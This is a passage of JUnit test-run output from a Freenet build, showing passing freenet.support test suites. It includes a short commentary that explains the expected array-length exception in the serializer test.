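            System.out.println(128L * 1000);                // "128 kbps"    -> 128000
            System.out.println(20L * 1024);                 // "20 KiB"      -> 20480
            System.out.println(5800L);                      // "5800"        -> 5800
        }
    }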
    [junit] Running freenet.support.FieldsTest
    [junit] Testsuite: freenet.support.FieldsTest
    [junit] Tests run: 18, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,396 sec
    [junit] Tests run: 18, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,396 sec
    [junit] 
    [junit] Testcase: testBytesToLongsException took 0,06 sec
    [junit] Testcase: testCommaListFromString took 0,001 sec
    [junit] Testcase: testHashcodeForByteArray took 0 sec
    [junit] Testcase: testLongHashcode took 0 sec
    [junit] Testcase: testHexToLong took 0,002 sec
    [junit] Testcase: testBoolToString took 0 sec
    [junit] Testcase: testBytesToLong took 0,001 sec
    [junit] Testcase: testIntsToBytes took 0,001 sec
    [junit] Testcase: testCompareVersion took 0,007 sec
    [junit] Testcase: testTrimLines took 0,004 sec
    [junit] Testcase: testHexToInt took 0,001 sec
    [junit] Testcase: testBytesToInt took 0 sec
    [junit] Testcase: testGetDigits took 0,708 sec
    [junit] Testcase: testStringToBool took 0,001 sec
    [junit] Testcase: testStringToBoolWithDefault took 0,001 sec
    [junit] Testcase: testStringArrayToCommaList took 0 sec
    [junit] Testcase: testBytesToLongException took 0,001 sec
    [junit] Testcase: testLongsToBytes took 0,001 sec
    [junit] Running freenet.support.HTMLEncoderDecoderTest
    [junit] Testsuite: freenet.support.HTMLEncoderDecoderTest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,969 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,969 sec
    [junit] 
    [junit] Testcase: testCompactRepeated took 0,092 sec
    [junit] Testcase: testDecodeAppendedEntities took 0,248 sec
    [junit] Testcase: testIsWhiteSpace took 0,002 sec
    [junit] Testcase: testDecodeIncomplete took 0 sec
    [junit] Testcase: testDecodeSingleEntities took 0,014 sec
    [junit] Testcase: testCompactMixed took 0,001 sec
    [junit] Running freenet.support.HTMLNodeTest
    [junit] Testsuite: freenet.support.HTMLNodeTest
    [junit] Tests run: 32, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,797 sec
    [junit] Tests run: 32, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,797 sec
    [junit] 
    [junit] Testcase: testHTMLNode_StringStringStringString_WrongAttributeName took 0,048 sec
    [junit] Testcase: testAddChildSameName took 0,018 sec
    [junit] Testcase: testHTMLNode_StringStringStringString_WrongNodeName took 0,002 sec
    [junit] Testcase: testAddChildUsingTheNodeItselfAsChild took 0,001 sec
    [junit] Testcase: testAddChild_StringArrayArrayString took 0,002 sec
    [junit] Testcase: testHTMLNodeArray_nullAttributeValue took 0,005 sec
    [junit] Testcase: testGenerate_fromHTMLNode_StringString took 0,124 sec
    [junit] Testcase: testHTMLNode_AttributesArray took 0,009 sec
    [junit] Testcase: testAddChildrenSameObject took 0,001 sec
    [junit] Testcase: testAddChild_StringArrayArray took 0,001 sec
    [junit] Testcase: testAddGetAttributes took 0,009 sec
    [junit] Testcase: testGenerate_HTMLNode_withChild took 0,003 sec
    [junit] Testcase: testGenerate_fromHTMLNode_String took 0,001 sec
    [junit] Testcase: testAddAttribute_nullAttributeValue took 0,001 sec
    [junit] Testcase: testAddChildrenUsingTheNodeItselfAsChild took 0,001 sec
    [junit] Testcase: testGenerate_fromHTMLNode_StringStringStringString took 0,002 sec
    [junit] Testcase: testHTMLNode_nullAttributeValue took 0,003 sec
    [junit] Testcase: testAddChild_StringStringStringString took 0,002 sec
    [junit] Testcase: testGenerate_fromHTMLNode_percentName took 0,001 sec
    [junit] Testcase: testGenerate_fromHTMLNode_StringStringString took 0,002 sec
    [junit] Testcase: testGenerate_fromHTMLNode_textareaDivA took 0,005 sec
    [junit] Testcase: testHTMLDoctype_generate took 0,001 sec
    [junit] Testcase: testGetAttribute took 0,003 sec
    [junit] Testcase: testAddChildSameObject took 0,001 sec
    [junit] Testcase: testHTMLNode_nullAttributeName took 0,001 sec
    [junit] Testcase: testHTMLNode_attributeArrays_differentLengths took 0,001 sec
    [junit] Testcase: testGetContent took 0,001 sec
    [junit] Testcase: testHTMLNodeArray_nullAttributeName took 0,001 sec
    [junit] Testcase: testAddChild_StringStringString took 0,001 sec
    [junit] Testcase: testAddAttribute_nullAttributeName took 0,001 sec
    [junit] Testcase: testGenerate_fromHTMLNodeWithChild_SpecialNames took 0,013 sec
    [junit] Testcase: testSameAttributeManyTimes took 0,003 sec
    [junit] Running freenet.support.HexUtilTest
    [junit] Testsuite: freenet.support.HexUtilTest
    [junit] Tests run: 19, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,763 sec
    [junit] Tests run: 19, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,763 sec
    [junit] 
    [junit] Testcase: testBytesToHex_byteIntInt_WithLongReading took 0,059 sec
    [junit] Testcase: testBitsToBytes_BitSetInt took 0,014 sec
    [junit] Testcase: testBytesToHex_byteIntInt_WithLongOffset took 0 sec
    [junit] Testcase: testHexToBits took 0,002 sec
    [junit] Testcase: testHexToBytes_StringByteInt_WithShortArray took 0,001 sec
    [junit] Testcase: testCountBytesForBits_int took 0,026 sec
    [junit] Testcase: testBiToHex_BigInteger took 0,009 sec
    [junit] Testcase: testHexToBytes_WithBadDigit took 0,001 sec
    [junit] Testcase: testBitsToBytes_WithShortSize took 0,001 sec
    [junit] Testcase: testBytesToHexZeroLength took 0,001 sec
    [junit] Testcase: testHexToBytes_StringByteInt took 0,008 sec
    [junit] Testcase: testHexToBytes_StringByteInt_WithLongOffset took 0,001 sec
    [junit] Testcase: testHexToBytes_StringInt took 0,008 sec
    [junit] Testcase: testHexToBytes_String took 0,014 sec
    [junit] Testcase: testWriteAndReadBigInteger took 0,002 sec
    [junit] Testcase: testBytesToBits_byteBitSetInt took 0,029 sec
    [junit] Testcase: testBitsToHexString took 0 sec
    [junit] Testcase: testBytesToHex_byte took 0,01 sec
    [junit] Testcase: testBytesToHex_byteIntInt_WithZeroLength took 0,001 sec
    [junit] Running freenet.support.JVMVersionTest
    [junit] Testsuite: freenet.support.JVMVersionTest
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,666 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,666 sec
    [junit] 
    [junit] Testcase: testNull took 0,026 sec
    [junit] Testcase: testCompare took 0,135 sec
    [junit] Testcase: testTooOld took 0,001 sec
    [junit] Testcase: testRecentEnough took 0,002 sec
    [junit] Running freenet.support.LRUMapTest
    [junit] Testsuite: freenet.support.LRUMapTest
    [junit] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,803 sec
    [junit] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,803 sec
    [junit] 
    [junit] Testcase: testPushNull took 0,104 sec
    [junit] Testcase: testGetNullKey took 0,004 sec
    [junit] Testcase: testPeekValue took 0,009 sec
    [junit] Testcase: testRemoveNotPresent took 0,004 sec
    [junit] Testcase: testGet took 0,004 sec
    [junit] Testcase: testKeys took 0,012 sec
    [junit] Testcase: testSize took 0,009 sec
    [junit] Testcase: testContainsKey took 0,004 sec
    [junit] Testcase: testRemoveNullKey took 0,004 sec
    [junit] Testcase: testPushSameKey took 0,004 sec
    [junit] Testcase: testPopValueFromEmpty took 0 sec
    [junit] Testcase: testPopValue took 0,007 sec
    [junit] Testcase: testPushSameObjTwice took 0,005 sec
    [junit] Testcase: testPopKey took 0,007 sec
    [junit] Testcase: testIsEmpty took 0,007 sec
    [junit] Testcase: testRemoveKey took 0,007 sec
    [junit] Running freenet.support.LRUQueueTest
    [junit] Testsuite: freenet.support.LRUQueueTest
    [junit] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,702 sec
    [junit] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,702 sec
    [junit] 
    [junit] Testcase: testPushNull took 0,054 sec
    [junit] Testcase: testToArray2 took 0,011 sec
    [junit] Testcase: testToArray took 0,021 sec
    [junit] Testcase: testRemoveNotPresent took 0,009 sec
    [junit] Testcase: testPop took 0,012 sec
    [junit] Testcase: testSize took 0,008 sec
    [junit] Testcase: testToArrayOrdered2 took 0,009 sec
    [junit] Testcase: testToArrayOrdered took 0,005 sec
    [junit] Testcase: testToArrayEmptyQueue took 0,001 sec
    [junit] Testcase: testPushLeast took 0,005 sec
    [junit] Testcase: testContains took 0,007 sec
    [junit] Testcase: testRemoveNull took 0,004 sec
    [junit] Testcase: testElements took 0,007 sec
    [junit] Testcase: testPushSameObjTwice took 0,005 sec
    [junit] Testcase: testIsEmpty took 0,007 sec
    [junit] Testcase: testRemove took 0,009 sec
    [junit] Running freenet.support.ListUtilsTest
    [junit] Testsuite: freenet.support.ListUtilsTest
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,564 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,564 sec
    [junit] 
    [junit] Testcase: testRemoveByObject took 0,025 sec
    [junit] Testcase: testRemoveByRandom took 0,006 sec
    [junit] Testcase: testRemoveByIndex took 0,005 sec
    [junit] Testcase: testRemoveByRandomSimple took 0,002 sec
    [junit] Running freenet.support.LoaderTest
    [junit] Testsuite: freenet.support.LoaderTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,504 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,504 sec
    [junit] 
    [junit] Testcase: testLoader took 0,012 sec
    [junit] Running freenet.support.MemoryLimitedJobRunnerTest
    [junit] Testsuite: freenet.support.MemoryLimitedJobRunnerTest
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 26,521 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 26,521 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testAsyncQueueingManySmallDelayed took 8,025 sec
    [junit] Testcase: testQueueingSmallDelayed took 5,638 sec
    [junit] Testcase: testQueueingManySmallDelayed took 7,33 sec
    [junit] Testcase: testAsyncQueueingSmallDelayed took 5,054 sec
    [junit] Running freenet.support.MultiValueTableTest
    [junit] Testsuite: freenet.support.MultiValueTableTest
    [junit] Tests run: 14, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,722 sec
    [junit] Tests run: 14, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,722 sec
    [junit] 
    [junit] Testcase: testContainsElement took 0,025 sec
    [junit] Testcase: testGetArray took 0,009 sec
    [junit] Testcase: testGet took 0,008 sec
    [junit] Testcase: testPut took 0,007 sec
    [junit] Testcase: testClear took 0,008 sec
    [junit] Testcase: testKeys took 0,007 sec
    [junit] Testcase: testGetSync took 0,012 sec
    [junit] Testcase: testContainsKey took 0,012 sec
    [junit] Testcase: testCountAll took 0,009 sec
    [junit] Testcase: testGetAll took 0,026 sec
    [junit] Testcase: testRemoveElement took 0,02 sec
    [junit] Testcase: testIsEmpty took 0,013 sec
    [junit] Testcase: testRemove took 0,007 sec
    [junit] Testcase: testDifferentKeysSameElement took 0,004 sec
    [junit] Running freenet.support.MutableBooleanTest
    [junit] Testsuite: freenet.support.MutableBooleanTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,472 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,472 sec
    [junit] 
    [junit] Testcase: testMutableBoolean took 0,014 sec
    [junit] Running freenet.support.PrioritizedSerialExecutorTest
    [junit] Testsuite: freenet.support.PrioritizedSerialExecutorTest
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] [J1, J2, J3, J4]
    [junit] [JM]
    [junit] [JM, J8, JN]
    [junit] [JM, J8, JN, JP, JQ, J2, JO, JR]
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,789 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,789 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] [J1, J2, J3, J4]
    [junit] [JM]
    [junit] [JM, J8, JN]
    [junit] [JM, J8, JN, JP, JQ, J2, JO, JR]
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testRun took 0,296 sec
    [junit] Testcase: testRunPrio took 0,016 sec
    [junit] Running freenet.support.PrioritizedTickerTest
    [junit] Testsuite: freenet.support.PrioritizedTickerTest
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Starting Ticker
    [junit] Starting Ticker
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,215 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,215 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Starting Ticker
    [junit] Starting Ticker
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testDeduping took 0,266 sec
    [junit] Testcase: testSimple took 0,457 sec
    [junit] Running freenet.support.RandomArrayIteratorTest
    [junit] Testsuite: freenet.support.RandomArrayIteratorTest
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,625 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,625 sec
    [junit] 
    [junit] Testcase: testReset took 0,02 sec
    [junit] Testcase: testNoSuchElement took 0,002 sec
    [junit] Testcase: testReadonly took 0,005 sec
    [junit] Testcase: testDefaultOrder took 0,002 sec
    [junit] Running freenet.support.SentTimeCacheTest
    [junit] Testsuite: freenet.support.SentTimeCacheTest
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,481 sec
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,481 sec
    [junit] 
    [junit] Testcase: testQueryAndRemove took 0,029 sec
    [junit] Testcase: testFifo took 0,004 sec
    [junit] Testcase: testMaxSize took 0,002 sec
    [junit] Running freenet.support.SerialExecutorTest
    [junit] Testsuite: freenet.support.SerialExecutorTest
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,7 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,7 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testBlocking took 0,284 sec
    [junit] Running freenet.support.SerializerTest
    [junit] Testsuite: freenet.support.SerializerTest
    [junit] Threw when too long; should be something about how the array is too long to serialize:
    [junit] java.lang.IllegalArgumentException: Cannot serialize an array of more than 255 doubles; attempted to serialize 256.
    [junit]     at freenet.support.Serializer.writeToDataOutputStream(Serializer.java:175)
    [junit]     at freenet.support.SerializerTest.testTooLongDoubleArray(SerializerTest.java:53)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
    [junit]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    [junit]     at java.lang.reflect.Method.invoke(Method.java:606)
    [junit]     at junit.framework.TestCase.runTest(TestCase.java:176)
    [junit]     at junit.framework.TestCase.runBare(TestCase.java:141)
    [junit]     at junit.framework.TestResult$1.protect(TestResult.java:122)
    [junit]     at junit.framework.TestResult.runProtected(TestResult.java:142)
    [junit]     at junit.framework.TestResult.run(TestResult.java:125)
    [junit]     at junit.framework.TestCase.run(TestCase.java:129)
    [junit]     at junit.framework.TestSuite.runTest(TestSuite.java:255)
    [junit]     at junit.framework.TestSuite.run(TestSuite.java:250)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.run(JUnitTestRunner.java:523)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.launch(JUnitTestRunner.java:1063)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.main(JUnitTestRunner.java:914)
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,557 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,557 sec
    [junit] ------------- Standard Output ---------------
    [junit] Threw when too long; should be something about how the array is too long to serialize:
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] java.lang.IllegalArgumentException: Cannot serialize an array of more than 255 doubles; attempted to serialize 256.
    [junit]     at freenet.support.Serializer.writeToDataOutputStream(Serializer.java:175)
    [junit]     at freenet.support.SerializerTest.testTooLongDoubleArray(SerializerTest.java:53)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
    [junit]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    [junit]     at java.lang.reflect.Method.invoke(Method.java:606)
    [junit]     at junit.framework.TestCase.runTest(TestCase.java:176)
    [junit]     at junit.framework.TestCase.runBare(TestCase.java:141)
    [junit]     at junit.framework.TestResult$1.protect(TestResult.java:122)
    [junit]     at junit.framework.TestResult.runProtected(TestResult.java:142)
    [junit]     at junit.framework.TestResult.run(TestResult.java:125)
    [junit]     at junit.framework.TestCase.run(TestCase.java:129)
    [junit]     at junit.framework.TestSuite.runTest(TestSuite.java:255)
    [junit]     at junit.framework.TestSuite.run(TestSuite.java:250)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.run(JUnitTestRunner.java:523)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.launch(JUnitTestRunner.java:1063)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.main(JUnitTestRunner.java:914)
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testTooLongDoubleArray took 0,036 sec
    [junit] Testcase: test took 0,048 sec
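The IllegalArgumentException in the trace above is exactly what testTooLongDoubleArray checks for: Serializer refuses to write a double array with more than 255 elements, presumably because the element count is stored in a single unsigned byte. A self-contained sketch of that guard (assumed behaviour, not the actual freenet.support.Serializer code):

    import java.io.ByteArrayOutputStream;
    import java.io.DataOutputStream;
    import java.io.IOException;

    // Self-contained sketch (not freenet.support.Serializer): a one-byte length
    // prefix can only describe up to 255 elements, so longer arrays are rejected.
    public class DoubleArrayLimitSketch {
        static void writeDoubles(double[] a, DataOutputStream dos) throws IOException {
            if (a.length > 255)
                throw new IllegalArgumentException("Cannot serialize an array of more than 255 doubles; attempted to serialize " + a.length + ".");
            dos.writeByte(a.length);          // single-byte length => 255 max
            for (double d : a) dos.writeDouble(d);
        }

        public static void main(String[] args) throws IOException {
            DataOutputStream dos = new DataOutputStream(new ByteArrayOutputStream());
            writeDoubles(new double[255], dos);     // accepted
            try {
                writeDoubles(new double[256], dos); // rejected, as in the test run above
            } catch (IllegalArgumentException e) {
                System.out.println("Threw as expected: " + e.getMessage());
            }
        }
    }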
    [junit] Running freenet.support.ShortBufferTest
    [junit] Testsuite: freenet.support.ShortBufferTest
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,758 sec
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,758 sec
    [junit] 
    [junit] Testcase: testShortBufferToString took 0,026 sec
    [junit] Testcase: testCopy took 0,003 sec
    [junit] Testcase: testByteArrayShortBuffer took 0,015 sec
    [junit] Testcase: testByteArrayIndexShortBuffer took 0,001 sec
    [junit] Testcase: testHashcode took 0,091 sec
    [junit] Testcase: testEquals took 0,001 sec
    [junit] Testcase: testDataInputStreamShortBuffer took 0,003 sec
    [junit] Testcase: testBadLength took 0,005 sec
    [junit] Running freenet.support.SimpleFieldSetTest
    [junit] Testsuite: freenet.support.SimpleFieldSetTest
    [junit] Starting iterator test
    [junit] Tests run: 37, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,849 sec
    [junit] Tests run: 37, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,849 sec
    [junit] ------------- Standard Output ---------------
    [junit] Starting iterator test
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testPutAndTPut_WithEmpty took 0,03 sec
    [junit] Testcase: testDirectSubsetNameIterator took 0,002 sec
    [junit] Testcase: testPutOverwrite_StringArray took 0,004 sec
    [junit] Testcase: testKeyIterator_String took 0,002 sec
    [junit] Testcase: testPut_StringSimpleFieldSet took 0,003 sec
    [junit] Testcase: testEmptyValue took 0,023 sec
    [junit] Testcase: testPut_StringBoolean took 0,089 sec
    [junit] Testcase: testPutAllOverwrite took 0,004 sec
    [junit] Testcase: testSplit took 0,002 sec
    [junit] Testcase: testSimpleFieldSet_StringBooleanBoolean took 0,002 sec
    [junit] Testcase: testToplevelKeyIterator took 0,002 sec
    [junit] Testcase: testPutOverwrite_String took 0,001 sec
    [junit] Testcase: testRemoveValue took 0,002 sec
    [junit] Testcase: testTPut_StringSimpleFieldSet took 0,002 sec
    [junit] Testcase: testKeyIterator took 0,002 sec
    [junit] Testcase: testPut_StringInt took 0,003 sec
    [junit] Testcase: testPutAppend took 0,004 sec
    [junit] Testcase: testSimpleFieldSetSubset_String took 0,003 sec
    [junit] Testcase: testRemoveSubset took 0,005 sec
    [junit] Testcase: testSimpleFieldSetPutSingle_StringString_WithTwoPairedMultiLevelChars took 0,001 sec
    [junit] Testcase: testSimpleFieldSetPutAppend_StringString_WithTwoPairedMultiLevelChars took 0,001 sec
    [junit] Testcase: testSimpleFieldSetPutAndGet_MultiLevel took 0,004 sec
    [junit] Testcase: testGetDoubleArray took 0,004 sec
    [junit] Testcase: testSimpleFieldSet_BufferedReaderBooleanBoolean took 0,001 sec
    [junit] Testcase: testNamesOfDirectSubsets took 0,002 sec
    [junit] Testcase: testBase64 took 0,033 sec
    [junit] Testcase: testKeyIterationPastEnd took 0,002 sec
    [junit] Testcase: testGetAll took 0,001 sec
    [junit] Testcase: testPut_StringDouble took 0,002 sec
    [junit] Testcase: testPut_StringChar took 0,001 sec
    [junit] Testcase: testPut_StringLong took 0,003 sec
    [junit] Testcase: testIsEmpty took 0,001 sec
    [junit] Testcase: testSimpleFieldSet_SimpleFieldSet took 0,002 sec
    [junit] Testcase: testGetIntArray took 0,009 sec
    [junit] Testcase: testPut_StringShort took 0,001 sec
    [junit] Testcase: testSimpleFieldSetPutAndGet_NoMultiLevel took 0,001 sec
    [junit] Testcase: testEndMarker took 0,002 sec
    [junit] Running freenet.support.SizeUtilTest
    [junit] Testsuite: freenet.support.SizeUtilTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,558 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,558 sec
    [junit] 
    [junit] Testcase: testFormatSizeLong_WithIntermediateValues took 0,033 sec
    [junit] Testcase: testFormatSizeLong took 0,004 sec
    [junit] Running freenet.support.SparseBitmapTest
    [junit] Testsuite: freenet.support.SparseBitmapTest
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,537 sec
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,537 sec
    [junit] 
    [junit] Testcase: testContainsThrowsOnBadRange took 0,022 sec
    [junit] Testcase: testAdd took 0,007 sec
    [junit] Testcase: testClear took 0,001 sec
    [junit] Testcase: testCombineBackwards took 0,005 sec
    [junit] Testcase: testCombineMiddle took 0 sec
    [junit] Testcase: testIteratorDoubleRemove took 0,001 sec
    [junit] Testcase: testRemove took 0,001 sec
    [junit] Testcase: testCombineAdjacent took 0,001 sec
    [junit] Running freenet.support.TimeSortedHashtableTest
    [junit] Testsuite: freenet.support.TimeSortedHashtableTest
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,528 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,528 sec
    [junit] 
    [junit] Testcase: testAddRemoveTS took 0,059 sec
    [junit] Testcase: testBeforeInclusive took 0,001 sec
    [junit] Testcase: testPairs took 0,005 sec
    [junit] Testcase: testAddRemove took 0,002 sec
    [junit] Running freenet.support.TimeUtilTest
    [junit] Testsuite: freenet.support.TimeUtilTest
    [junit] Tests run: 7, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,628 sec
    [junit] Tests run: 7, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,628 sec
    [junit] 
    [junit] Testcase: testFormatTime_LongIntBoolean_milliseconds took 0,108 sec
    [junit] Testcase: testFormatTime_Long took 0,001 sec
    [junit] Testcase: testFormatTime_LongIntBoolean_tooManyTerms took 0,001 sec
    [junit] Testcase: testFormatTime_LongIntBoolean_maxTerms took 0,001 sec
    [junit] Testcase: testFormatTime_KnownValues took 0,001 sec
    [junit] Testcase: testFormatTime_LongIntBoolean_MaxValue took 0,001 sec
    [junit] Testcase: testFormatTime_LongInt took 0,001 sec
    [junit] Running freenet.support.URIPreEncoderTest
    [junit] Testsuite: freenet.support.URIPreEncoderTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 3,076 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 3,076 sec
    [junit] 
    [junit] Testcase: testEncodeURI took 0,011 sec
    [junit] Testcase: testEncode took 2,128 sec
    [junit] Running freenet.support.URLEncoderDecoderTest
    [junit] Testsuite: freenet.support.URLEncoderDecoderTest
    [junit] Tests run: 7, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 4,964 sec
    [junit] Tests run: 7, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 4,964 sec
    [junit] 
    [junit] Testcase: testEncodeDecodeString_allChars took 3,832 sec
    [junit] Testcase: testEncodeForced took 0,055 sec
    [junit] Testcase: testDecodeWrongString took 0,001 sec
    [junit] Testcase: testDecodeWrongHex took 0,012 sec
    [junit] Testcase: testEncodeDecodeString_notSafeBaseChars took 0,003 sec
    [junit] Testcase: testTolerantDecoding took 0,001 sec
    [junit] Testcase: testEncodeDecodeString_notSafeAdvChars took 0,015 sec
    [junit] Running freenet.support.compress.Bzip2CompressorTest
    [junit] Testsuite: freenet.support.compress.Bzip2CompressorTest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,657 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,657 sec
    [junit] 
    [junit] Testcase: testBzip2Compressor took 0,104 sec
    [junit] Testcase: testByteArrayDecompress took 0,569 sec
    [junit] Testcase: testBucketDecompress took 0,008 sec
    [junit] Testcase: testCompress took 0,227 sec
    [junit] Testcase: testCompressException took 0,098 sec
    [junit] Testcase: testDecompressException took 0,147 sec
    [junit] Running freenet.support.compress.GzipCompressorTest
    [junit] Testsuite: freenet.support.compress.GzipCompressorTest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,709 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,709 sec
    [junit] 
    [junit] Testcase: testGzipCompressor took 0,108 sec
    [junit] Testcase: testByteArrayDecompress took 0,108 sec
    [junit] Testcase: testBucketDecompress took 0,002 sec
    [junit] Testcase: testCompress took 0,002 sec
    [junit] Testcase: testCompressException took 0,001 sec
    [junit] Testcase: testDecompressException took 0,014 sec
    [junit] Running freenet.support.compress.NewLzmaCompressorTest
    [junit] Testsuite: freenet.support.compress.NewLzmaCompressorTest
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 15,674 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 15,674 sec
    [junit] 
    [junit] Testcase: testNewLzmaCompressor took 0,105 sec
